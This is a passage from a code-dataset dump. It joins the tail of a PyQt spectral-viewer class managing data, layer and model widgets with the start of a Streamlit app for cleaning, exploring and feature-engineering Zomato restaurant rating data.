current_sub_window(self):\n \"\"\"\n Returns the currently active `PlotSubWindow` object.\n\n Returns\n -------\n sub_window : PlotSubWindow\n The currently active `PlotSubWindow` object.\n \"\"\"\n if self._current_sub_window is not None:\n return self._current_sub_window.widget()\n\n @property\n def current_model(self):\n return self.main_window.modelsComboBox.currentText()\n\n @property\n def current_fitter(self):\n return self.main_window.fittingRoutinesComboBox.currentText()\n\n @property\n def current_model_formula(self):\n return self.main_window.lineEdit.text()\n\n def add_sub_window(self, *args, **kwargs):\n \"\"\"\n Creates a new sub window instance in the MDI area.\n\n Returns\n -------\n new_sub_window : QMdiSubWindow\n The MdiSubWindow Qt instance.\n wgt_sub_window : QWidget\n The widget object within the QMdiSubWindow.\n \"\"\"\n # Create new window\n plot_sub_window = PlotSubWindow()\n\n new_sub_window = self.main_window.mdiArea.addSubWindow(plot_sub_window)\n new_sub_window.show()\n\n return plot_sub_window\n\n def open_file_dialog(self, filters):\n \"\"\"\n Given a list of filters, prompts the user to select an existing file\n and returns the file path and filter.\n\n Parameters\n ----------\n filters : list\n List of filters for the dialog.\n\n Returns\n -------\n file_name : str\n Path to the selected file.\n selected_filter : str\n The chosen filter (this indicates which custom loader from the\n registry to use).\n \"\"\"\n dialog = QFileDialog(self)\n dialog.setFileMode(QFileDialog.ExistingFile)\n dialog.setNameFilters([x for x in filters])\n\n if dialog.exec_():\n file_names = dialog.selectedFiles()\n selected_filter = dialog.selectedNameFilter()\n\n return file_names[0], selected_filter\n\n return None, None\n\n @DispatchHandle.register_listener(\"on_added_data\")\n def add_data_item(self, data):\n \"\"\"\n 
Adds a `Data` object to the loaded data list widget.\n\n Parameters\n ----------\n data : specviz.core.data.Data\n The `Data` object to add to the list widget.\n \"\"\"\n new_item = QListWidgetItem(data.name, self.wgt_data_list)\n new_item.setFlags(new_item.flags() | Qt.ItemIsEditable)\n\n new_item.setData(Qt.UserRole, data)\n\n self.wgt_data_list.setCurrentItem(new_item)\n\n @DispatchHandle.register_listener(\"on_removed_data\")\n def remove_data_item(self, data):\n data_item = self.get_data_item(data)\n\n self.wgt_data_list.takeItem(self.wgt_data_list.row(data_item))\n\n def get_data_item(self, data):\n for i in range(self.wgt_data_list.count()):\n data_item = self.wgt_data_list.item(0)\n\n if data_item.data(Qt.UserRole) == data:\n return data_item\n\n @DispatchHandle.register_listener(\"on_added_layer\")\n def add_layer_item(self, layer, unique=True):\n \"\"\"\n Adds a `Layer` object to the loaded layer list widget.\n\n Parameters\n ----------\n layer : specviz.core.data.Layer\n The `Layer` object to add to the list widget.\n \"\"\"\n # Make sure there is only one item per layer object\n if unique:\n if self.get_layer_item(layer) is not None:\n return\n\n new_item = QTreeWidgetItem(self.get_layer_item(layer._parent) or\n self.wgt_layer_list)\n new_item.setFlags(new_item.flags() | Qt.ItemIsUserCheckable | Qt.ItemIsEditable)\n new_item.setText(0, layer.name)\n new_item.setData(0, Qt.UserRole, layer)\n new_item.setCheckState(0, Qt.Checked)\n\n self.wgt_layer_list.setCurrentItem(new_item)\n\n def get_layer_item(self, layer):\n root = self.wgt_layer_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if child.data(0, Qt.UserRole) == layer:\n return child\n\n for j in range(child.childCount()):\n sec_child = child.child(j)\n\n if sec_child.data(0, Qt.UserRole) == layer:\n return sec_child\n\n @DispatchHandle.register_listener(\"on_removed_layer\")\n def remove_layer_item(self, layer):\n root = self.wgt_layer_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if child.data(0, Qt.UserRole) == layer:\n root.removeChild(child)\n break\n\n for j in range(child.childCount()):\n sec_child = child.child(j)\n\n if sec_child.data(0, Qt.UserRole) == layer:\n child.removeChild(sec_child)\n break\n\n @DispatchHandle.register_listener(\"on_added_plot\", \"on_updated_plot\")\n def update_layer_item(self, container=None, *args, **kwargs):\n if container is None:\n return\n\n layer = container._layer\n pixmap = QPixmap(10, 10)\n pixmap.fill(container.pen.color())\n icon = QIcon(pixmap)\n\n layer_item = self.get_layer_item(layer)\n\n if layer_item is not None:\n layer_item.setIcon(0, icon)\n\n @DispatchHandle.register_listener(\"on_added_model\")\n def add_model_item(self, model, layer, unique=True):\n \"\"\"\n Adds an `astropy.modeling.Model` to the loaded model tree widget.\n\n Parameters\n ----------\n \"\"\"\n if model is None:\n return\n\n if unique:\n if self.get_model_item(model) is not None:\n return\n\n name = model.name\n\n if not name:\n count = 1\n\n root = self.wgt_model_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if isinstance(model, child.data(0, Qt.UserRole).__class__):\n count += 1\n\n name = model.__class__.__name__.replace('1D', '') + str(count)\n model._name = name\n\n new_item = QTreeWidgetItem()\n new_item.setFlags(new_item.flags() | Qt.ItemIsEditable)\n\n new_item.setText(0, name)\n new_item.setData(0, Qt.UserRole, model)\n\n for i, para in 
enumerate(model.param_names):\n new_para_item = QTreeWidgetItem(new_item)\n new_para_item.setText(0, para)\n new_para_item.setData(0, Qt.UserRole,\n model.parameters[i])\n new_para_item.setText(1, \"{:4.4g}\".format(model.parameters[i]))\n new_para_item.setFlags(new_para_item.flags() | Qt.ItemIsEditable)\n\n self.wgt_model_list.addTopLevelItem(new_item)\n\n @DispatchHandle.register_listener(\"on_removed_model\")\n def remove_model_item(self, model=None, layer=None):\n root = self.wgt_model_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if child is None:\n continue\n\n if child.data(0, Qt.UserRole) == model:\n root.removeChild(child)\n break\n\n def update_model_item(self, model):\n if hasattr(model, '_submodels'):\n for sub_model in model._submodels:\n self.update_model_item(sub_model)\n else:\n return\n\n model_item = self.get_model_item(model)\n\n if model_item is None:\n return\n\n for i, para in enumerate(model.param_names):\n for i in range(model_item.childCount()):\n param_item = model_item.child(i)\n\n if param_item.text(0) == para:\n param_item.setText(1, \"{:4.4g}\".format(\n model.parameters[i]))\n\n def get_model_item(self, model):\n root = self.wgt_model_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if child.data(0, Qt.UserRole) == model:\n return child\n\n def _model_parameter_validation(self, item, col):\n if col == 0:\n return\n\n try:\n txt = \"{:4.4g}\".format(float(item.text(col)))\n item.setText(col, txt)\n item.setData(col, Qt.UserRole, float(item.text(col)))\n except ValueError:\n prev_val = item.data(col, Qt.UserRole)\n item.setText(col, str(prev_val))\n\n def get_model_inputs(self):\n \"\"\"\n Returns the model and current parameters displayed in the UI.\n\n Returns\n -------\n models : dict\n A dictionary with the model instance as the key and a list of\n floats as the parameters values.\n \"\"\"\n root = self.wgt_model_list.invisibleRootItem()\n models = {}\n\n for model_item in [root.child(j) for j in range(root.childCount())]:\n model = model_item.data(0, Qt.UserRole)\n args = []\n\n for i in range(model_item.childCount()):\n child_item = model_item.child(i)\n child = child_item.text(1)\n\n args.append(float(child))\n\n models[model] = args\n\n return models\n\n def clear_layer_widget(self):\n self.wgt_layer_list.clear()\n\n def clear_model_widget(self):\n self.wgt_model_list.clear()\n\n @DispatchHandle.register_listener(\"on_updated_stats\")\n def update_statistics(self, stats, layer):\n self.main_window.currentLayerLineEdit.setText(\"{}\".format(layer.name))\n\n if 'mean' in stats:\n self.main_window.meanLineEdit.setText(\"{0:4.4g}\".format(\n stats['mean'].value))\n\n self.main_window.medianLineEdit.setText(\"{0:4.4g}\".format(\n stats['median'].value))\n\n self.main_window.standardDeviationLineEdit.setText(\"{0:4.4g}\".format(\n stats['stddev'].value))\n\n self.main_window.totalLineEdit.setText(\"{0:4.4g}\".format(\n float(stats['total'].value)))\n\n self.main_window.dataPointCountLineEdit.setText(\n str(stats['npoints']))\n\n if 'eq_width' in stats:\n self.main_window.equivalentWidthLineEdit.setText(\"{0:4.4g}\".format(\n float(stats['eq_width'].value)))\n\n if 'centroid' in stats:\n self.main_window.centroidLineEdit.setText(\"{0:5.5g}\".format(\n float(stats['centroid'].value)))\n\n if 'flux' in stats:\n self.main_window.fluxLineEdit.setText(\"{0:4.4g}\".format(\n float(stats['flux'].value)))\n\n if 'avg_cont' in stats:\n 
self.main_window.meanContinuumLineEdit.setText(\"{0:4.4g}\".format(\n float(stats['avg_cont'].value)))\n\n\n @DispatchHandle.register_listener(\"on_added_linelist\")\n def add_linelist(self, linelist):\n\n # This is setting all markers at a fixed heigth in the\n # initial (before any zoom) data coordinates. Still TBD\n # how to do this in the generic case. Maybe derive heights\n # from curve data instead? Make the markers follow the\n # curve ups and downs?\n #\n # Ideally we would like to have the marker's X coordinate\n # pinned down to the plot surface in data value, and the Y\n # coordinate pinned down in screen value. This would make\n # the markers to stay at the same height in the window even\n # when the plot is zoomed. This kind of functionality doesn't\n # seem to be possible under pyqtgraph though. This requires\n # more investigation.\n\n plot_item = self.current_sub_window._plot_item\n\n # curve = plot_item.curves[0]\n\n data_range = plot_item.vb.viewRange()\n ymin = data_range[1][0]\n ymax = data_range[1][1]\n height = (ymax - ymin) * 0.75 + ymin\n\n # column names are defined in the YAML files.\n wave_column = linelist.columns['wavelength']\n id_column = linelist.columns['id']\n\n for i in range(len(wave_column)):\n marker = LineIDMarker(id_column[i], plot_item, orientation='vertical')\n\n marker.setPos(wave_column[i], height)\n\n plot_item.addItem(marker)\n # plot_item.addItem(marker.arrow)\n\n plot_item.update()\n\n plot_item.update()\n\n\n\n","sub_path":"specviz/ui/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":17425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"90885741","text":"import streamlit as st \r\nimport numpy as np \r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import ExtraTreesRegressor\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom xgboost import XGBRegressor\r\nimport tensorflow as tf\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn.model_selection import train_test_split\r\nimport pickle\r\n\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nmatplotlib.use('Agg')\r\n\r\n\r\nfrom PIL import Image\r\n\r\n#Set title\r\n\r\n# st.title('Zomato Restaurant Rating')\r\n# image = Image.open('Zomato.jpg')\r\n# st.image(image,use_column_width=True)\r\n\r\n\r\n\r\ndef main():\r\n\tactivities=['Data Preparation','Exploratory Data Analysis','Feature Engineering','Model','Predict Rating','About us']\r\n\toption=st.sidebar.selectbox('Selection option:',activities)\r\n\r\n\tif option=='Data Preparation' or option== 'Exploratory Data Analysis' or option=='Feature Engineering' or option=='Model':\r\n\r\n\t\tst.title('Zomato Restaurant Rating')\r\n\t\timage = Image.open('Zomato.jpg')\r\n\t\tst.image(image,use_column_width=True)\r\n\r\n\t\tdata=st.file_uploader(\"Upload dataset:\",type=['csv'])\r\n\r\n\t\tif data is not None:\r\n\t\t\tst.success(\"Data successfully loaded\")\r\n\t\t\tst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n\t#DEALING WITH THE DATA PREPARATION PART\r\n\r\n\r\n\t\tif option=='Data Preparation':\r\n\t\t\tst.subheader(\"Data Preparation\")\r\n\t\t\tst.write(\"\"\"\r\n\t\t\t\t### Showing top 50 records\r\n\t\t\t\t\"\"\") \r\n\t\t\tif data is not 
None:\r\n\t \r\n\t \r\n\t\t\t\tdf=pd.read_csv(data)\r\n\t\t\t\tst.dataframe(df.head(50))\r\n\r\n\t\t\t\tst.warning('Please check box in sequence for Data Preparation phase else you might get error')\r\n\r\n\t\t\t\tif st.checkbox(\"Display shape\"):\r\n\t\t\t\t\tst.write(df.shape)\r\n\t\t\t\tif st.checkbox(\"Display columns\"):\r\n\t\t\t\t\tst.write(df.columns)\r\n\r\n\t\t\t\tif st.checkbox('Display Null Values'):\r\n\t\t\t\t\tst.write(df.isnull().sum())\r\n\r\n\t\t\t\tif st.checkbox(\"Display the data types\"):\r\n\t\t\t\t\tst.write(df.dtypes)\r\n\r\n\t\t\t\tif st.checkbox(\"Count of duplicate records\"):\r\n\t\t\t\t\tst.write(df.duplicated().sum())\r\n\r\n\t\t\t\tif st.checkbox(\"Display null record for dish_liked columns\"):\r\n\t\t\t\t\tst.write(df[df['dish_liked'].isnull()].head())\r\n\r\n\t\t\t\tif st.checkbox(\"Replace null value of dish_liked column with 'not_available'\"):\r\n\t\t\t\t\tdf['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t\t\t\tst.write(df[df['dish_liked']=='not_available'].head())\r\n\t \r\n\t\t\t\tif st.checkbox(\"Drop url,address and phone column\"):\r\n\t\t\t\t\tdf.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t\t\t\tst.write(df.columns)\r\n\r\n\t\t\t\tif st.checkbox(\"Check null values after correction in dish_liked column\"):\r\n\t\t\t\t\tst.write(df.isnull().sum())\r\n\t\t\t\t\tst.write(\"Null values in rate column need to be dropped and rest of columns has very few null record.Hence dropping all null values\")\r\n\r\n\t\t\t\tif st.checkbox(\"Drop null values(as null records are less now)\"):\r\n\t\t\t\t\tdf.dropna(how='any',inplace=True)\r\n\t\t\t\t\tst.write(df.isnull().sum())\r\n\r\n\t\t\t\tif st.checkbox(\"Renaming columes appropriately\"):\r\n\t\t\t\t\tdf = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t\t\t\tst.write(df.columns)\r\n\t \r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Cost Column\r\n\t\t\t\t\t\"\"\")\r\n\t\t\t\tif st.checkbox(\"Display Unique values of cost\"):\r\n\t\t\t\t\tst.write(df['cost'].unique())\r\n\t\t\t\tif st.checkbox(\"Remove commas\"):\r\n\t\t\t\t\tdf['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t\t\t\tdf['cost'] = df['cost'].astype(float)\r\n\t\t\t\t\tst.write(df['cost'].unique())\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Rate Column\r\n\t\t\t\t\t\"\"\")\r\n\t\t\t\tif st.checkbox(\"Display Unique values of rate\"):\r\n\t\t\t\t\tst.write(df['rate'].unique())\r\n\t\t\t\tif st.checkbox(\"Get rid of 'NEW' and '-' values\"):\r\n\t\t\t\t\tdf = df.loc[df.rate !='NEW']\r\n\t\t\t\t\tdf = df.loc[df.rate !='-']\r\n\t\t\t\t\tst.write(df['rate'].unique())\r\n\t\t\t\tif st.checkbox(\"Make it float value\"):\r\n\t\t\t\t\tdf['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t\t\t\tdf['rate'] = df['rate'].astype(float)\r\n\t\t\t\t\tst.write(df['rate'].unique())\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### reviews_list Column\r\n\t\t\t\t\t\"\"\")\r\n\t\t\t\tif st.checkbox(\"Display few records of reviews_list\"):\r\n\t\t\t\t\tst.write(df['reviews_list'].head())\r\n\t\t\t\tif st.checkbox(\"Fetch rating only\"):\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t\t\t\tdf['reviews_list'] = 
df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t\t\t\tdigits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t\t\t\tdf = df[digits_in_review['reviews_list'] == True]\r\n\t\t\t\t\tdf['reviews_list'] = df['reviews_list'].astype(float)\r\n\t\t\t\t\tst.write(df['reviews_list'].head())\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Showing record after DataPreparation Stage\r\n\t\t\t\t\t\"\"\")\t\t\t\r\n\t\t\t\tif st.checkbox('Show record'):\r\n\t\t\t\t\tst.write(df.head())\r\n\r\n\t#DEALING WITH THE EDA PART\r\n\r\n\r\n\t\telif option=='Exploratory Data Analysis':\r\n\t\t\tst.subheader(\"Exploratory Data Analysis\")\r\n\t \t\r\n\t\t\tif data is not None:\r\n\t \r\n\t \r\n\t\t\t\t# Data Preparation Phase\r\n\t\t\t\tdf=pd.read_csv(data)\r\n\t\t\t\tdf['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t\t\tdf.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t\t\tdf.dropna(how='any',inplace=True)\r\n\t\t\t\tdf = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t\t\tdf['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t\t\tdf['cost'] = df['cost'].astype(float)\r\n\t\t\t\tdf = df.loc[df.rate !='NEW']\r\n\t\t\t\tdf = df.loc[df.rate !='-']\r\n\t\t\t\tdf['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t\t\tdf['rate'] = df['rate'].astype(float)\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t\t\tdigits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t\t\tdf = df[digits_in_review['reviews_list'] == True]\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].astype(float)\r\n\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Univariate analysis\r\n\t\t\t\t\t\"\"\")\t\r\n\t \r\n\r\n\r\n\r\n\t\t\t\tif st.checkbox('Most famous restaurants chains in Bangaluru(upto 20)'):\r\n\t\t\t\t\tfig = plt.figure(figsize=(17,10))\r\n\t\t\t\t\tchains=df['name'].value_counts()[:20]\r\n\t\t\t\t\tsns.barplot(x=chains,y=chains.index,palette='deep')\r\n\t\t\t\t\tplt.title(\"Most famous restaurants chains in Bangaluru\")\r\n\t\t\t\t\tplt.xlabel(\"Number of outlets\")\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Cafe Coffee Day and Onesta seems to be most famous\")\r\n\r\n\t\t\t\tif st.checkbox('Whether restaurant offer Table booking or not'):\r\n\t\t\t\t\tbook=df['book_table'].value_counts()\r\n\t\t\t\t\tfig = plt.figure(figsize= (2,2))\r\n\t\t\t\t\tbook.plot.pie(autopct=\"%.1f%%\")\r\n\t\t\t\t\t# plt.title('Table Booking')\r\n\t\t\t\t\t\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Most of the Restaurants do not offer table booking\")\r\n\r\n\t\t\t\tif st.checkbox('Whether Restaurants deliver online or Not'):\r\n\t\t\t\t\tonline=df['online_order'].value_counts()\r\n\t\t\t\t\tfig = plt.figure(figsize= (2,2))\r\n\t\t\t\t\tonline.plot.pie(autopct=\"%.1f%%\")\r\n\t\t\t\t\t# plt.title('Whether Restaurants deliver online or Not')\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Most Restaurants offer option for online order and delivery\")\r\n\r\n\t\t\t\tif st.checkbox('Rating Distribution'):\r\n\t\t\t\t\tfig = 
plt.figure(figsize=(9,7))\r\n\t\t\t\t\tsns.distplot(df['rate'],bins=20)\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Pie Chart\")\r\n\t\t\t\t\tslices=[((df['rate']>=1) & (df['rate']<2)).sum(),\r\n\t\t\t\t\t\t\t((df['rate']>=2) & (df['rate']<3)).sum(),\r\n\t\t\t\t\t\t\t((df['rate']>=3) & (df['rate']<4)).sum(),\r\n\t\t\t\t\t\t\t(df['rate']>=4).sum()\r\n\t\t\t\t\t\t\t]\r\n\t\t\t\t\tfig = plt.figure(figsize= (10,10))\r\n\t\t\t\t\tlabels=['1-2','2-3','3-4','4-5']\r\n\t\t\t\t\tcolors = ['#ff3333','#c2c2d6','#6699ff','#00b377']\r\n\t\t\t\t\tplt.pie(slices,colors=colors, labels=labels, autopct='%1.0f%%')\r\n\r\n\t\t\t\t\tplt.title(\"Percentage of Restaurants according to their ratings\")\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"We can infer from above that most of the ratings are between 3.5 and 4.5\")\r\n\r\n\t\t\t\tif st.checkbox('Service Types'):\r\n\t\t\t\t\tfig = plt.figure(figsize=(9,7))\r\n\r\n\t\t\t\t\tsns.countplot(df['type']).set_xticklabels(sns.countplot(df['type']).get_xticklabels(), rotation=90)\r\n\t\t\t\t\tfig = plt.gcf()\r\n\t\t\t\t\tfig.set_size_inches(12,12)\r\n\t\t\t\t\tplt.title('Type of Service')\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"The two main service types are Delivery and Dine-out\")\r\n\r\n\t\t\t\tif st.checkbox('Distribution of Cost of Food for two People'):\r\n\t\t\t\t\tfig = plt.figure(figsize=(8,8))\r\n\t\t\t\t\tsns.distplot(df['cost'])\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Box Plot\")\r\n\t\t\t\t\tfig = plt.figure(figsize= (10,10))\r\n\t\t\t\t\tsns.boxplot(data =df['cost'],y = df['cost'])\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"The median of cost seems to be around 800-900\")\r\n\r\n\t\t\t\tif st.checkbox(\"Most Liked Dishes\"):\r\n\t\t\t\t\timport re\r\n\r\n\t\t\t\t\tdf.index=range(df.shape[0])\r\n\t\t\t\t\tlikes=[]\r\n\t\t\t\t\tfor i in range(df.shape[0]):\r\n\t\t\t\t\t\tarray_split=re.split(',',df['dish_liked'][i])\r\n\t\t\t\t\t\tfor item in array_split:\r\n\t\t\t\t\t\t\tlikes.append(item)\r\n\r\n\t\t\t\t\tfig = plt.figure(figsize=(17,10))\r\n\t\t\t\t\tfavourite_food = pd.Series(likes).value_counts()\r\n\t\t\t\t\tfood=favourite_food[1:21]\r\n\t\t\t\t\tsns.barplot(x=food,y=food.index,palette='deep')\r\n\t\t\t\t\tplt.title(\"Most liked dish\")\r\n\t\t\t\t\tplt.xlabel(\"Count\")\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"The 5 most liked dishes are Pasta, Pizza, Cocktails, Burgers, and Mocktails\")\r\n\r\n\t\t\t\tif st.checkbox('Restaurant types'):\r\n\t\t\t\t\tfig = plt.figure(figsize=(17,10))\r\n\t\t\t\t\trest=df['rest_type'].value_counts()[:20]\r\n\t\t\t\t\tsns.barplot(rest,rest.index)\r\n\t\t\t\t\tplt.title(\"Restaurant types\")\r\n\t\t\t\t\tplt.xlabel(\"count\")\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"Casual Dining and Quick Bites are the 2 most common types of Restaurants\")\r\n\r\n\r\n\r\n\r\n\t\t\t\tst.write(\"\"\"\r\n\t\t\t\t\t### Multivariate analysis\r\n\t\t\t\t\t\"\"\")\t\r\n\t \r\n\r\n\t\t\t\tif st.checkbox(\"Display Correlation\"):\r\n\t\t\t\t\tfig=plt.figure(figsize=(23,12))\r\n\t\t\t\t\tsns.heatmap(df.corr(),annot=True)\r\n\t\t\t\t\tst.pyplot(fig)\r\n\t\t\t\t\tst.write(\"The features are less correlated which is a good thing for us to avoid Multicollinearity\")\r\n\r\n\t\t\t\t\r\n\r\n\r\n\t\t\t\tif st.checkbox(\"Pairplot\"):\r\n\t\t\t\t\t# fig, ax = plt.subplots()\r\n\t\t\t\t\t\r\n\t\t\t\t\tsns.pairplot(df,kind='scatter')\r\n\t\t\t\t\tst.pyplot()\r\n\t \r\n\t\t\t\tif st.checkbox(\"Display summary\"):\r\n\t\t\t\t\tst.write(df.describe().T)\r\n\r\n\r\n\t\t\t\t\r\n\t\t\t\r\n\t#DEALING WITH THE Feature 
Engineering PART\r\n\r\n\r\n\t\telif option=='Feature Engineering':\r\n\t\t\tst.subheader(\"Feature Engineering\")\r\n\t \t\r\n\t\t\tif data is not None:\r\n\t \r\n\t \r\n\t\t\t\t# Data Preparation Phase\r\n\t\t\t\tdf=pd.read_csv(data)\r\n\t\t\t\tdf['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t\t\tdf.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t\t\tdf.dropna(how='any',inplace=True)\r\n\t\t\t\tdf = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t\t\tdf['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t\t\tdf['cost'] = df['cost'].astype(float)\r\n\t\t\t\tdf = df.loc[df.rate !='NEW']\r\n\t\t\t\tdf = df.loc[df.rate !='-']\r\n\t\t\t\tdf['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t\t\tdf['rate'] = df['rate'].astype(float)\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t\t\tdigits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t\t\tdf = df[digits_in_review['reviews_list'] == True]\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].astype(float)\r\n\r\n\r\n\t\t\t\tst.write(\"Showing top 10 records\")\r\n\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox('Convert the online_order categorical variables into a numeric format'):\r\n\r\n\t\t\t\t\tdf.online_order[df.online_order == 'Yes'] = 1 \r\n\t\t\t\t\tdf.online_order[df.online_order == 'No'] = 0\r\n\t\t\t\t\tdf.online_order = pd.to_numeric(df.online_order)\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox('Convert the book_table categorical variables into a numeric format'):\r\n\r\n\t\t\t\t\tdf.book_table[df.book_table == 'Yes'] = 1 \r\n\t\t\t\t\tdf.book_table[df.book_table == 'No'] = 0\r\n\t\t\t\t\tdf.book_table = pd.to_numeric(df.book_table)\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tst.write(\"Location\")\r\n\r\n\t\t\t\tif st.checkbox(\"Display unique location\"):\r\n\t\t\t\t\tst.write(df['location'].unique())\r\n\r\n\t\t\t\tif st.checkbox(\"Display top 20 location\"):\r\n\t\t\t\t\ttop_20_location = df['location'].value_counts()[:20]\r\n\t\t\t\t\tst.write(top_20_location.index)\r\n\r\n\t\t\t\tif st.checkbox(\"Convert the location other than top 20 into 'other_location'\"):\r\n\t\t\t\t\tdf['location'] = df['location'].apply(lambda x: x if x in top_20_location.index else 'other_location')\r\n\t\t\t\t\tst.write(df['location'].unique())\r\n\r\n\r\n\t\t\t\tst.write(\"rest_type\")\r\n\r\n\t\t\t\tif st.checkbox(\"Display unique rest_type\"):\r\n\t\t\t\t\tst.write(df['rest_type'].unique())\r\n\r\n\t\t\t\tif st.checkbox(\"Display top 10 rest_type\"):\r\n\t\t\t\t\ttop_10_rest_type = df['rest_type'].value_counts()[:10]\r\n\t\t\t\t\tst.write(top_10_rest_type.index)\r\n\r\n\t\t\t\tif st.checkbox(\"Convert the rest_type other than top 10 into 'other_rest_type'\"):\r\n\t\t\t\t\tdf['rest_type'] = df['rest_type'].apply(lambda x: x if x in top_10_rest_type.index else 'other_rest_type')\r\n\t\t\t\t\tst.write(df['rest_type'].unique())\r\n\r\n\r\n\r\n\t\t\t\tst.write(\"cuisines\")\r\n\r\n\t\t\t\tif st.checkbox(\"Display unique 
cuisines\"):\r\n\t\t\t\t\tst.write(df['cuisines'].unique())\r\n\r\n\t\t\t\tif st.checkbox(\"Display top 15 cuisines\"):\r\n\t\t\t\t\ttop_15_cuisines= df['cuisines'].value_counts()[:15]\r\n\t\t\t\t\tst.write(top_15_cuisines.index)\r\n\r\n\t\t\t\tif st.checkbox(\"Convert the cuisines other than top 15 into 'other_cuisines'\"):\r\n\t\t\t\t\tdf['cuisines'] = df['cuisines'].apply(lambda x: x if x in top_15_cuisines.index else 'other_cuisines')\r\n\t\t\t\t\tst.write(df['cuisines'].unique())\r\n\r\n\t\t\t\tst.text(\"---\"*100)\r\n\r\n\t\t\t\tif st.checkbox(\"Drop name,city,dish_liked and menu_item columns\"):\r\n\t\t\t\t\t# df.drop(['menu_item','dish_liked'],axis = 1 , inplace = True)\r\n\t\t\t\t\tdf.drop(['name','menu_item','dish_liked','city'],axis=1,inplace = True)\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox('Apply Onehot Encoding on the categorical 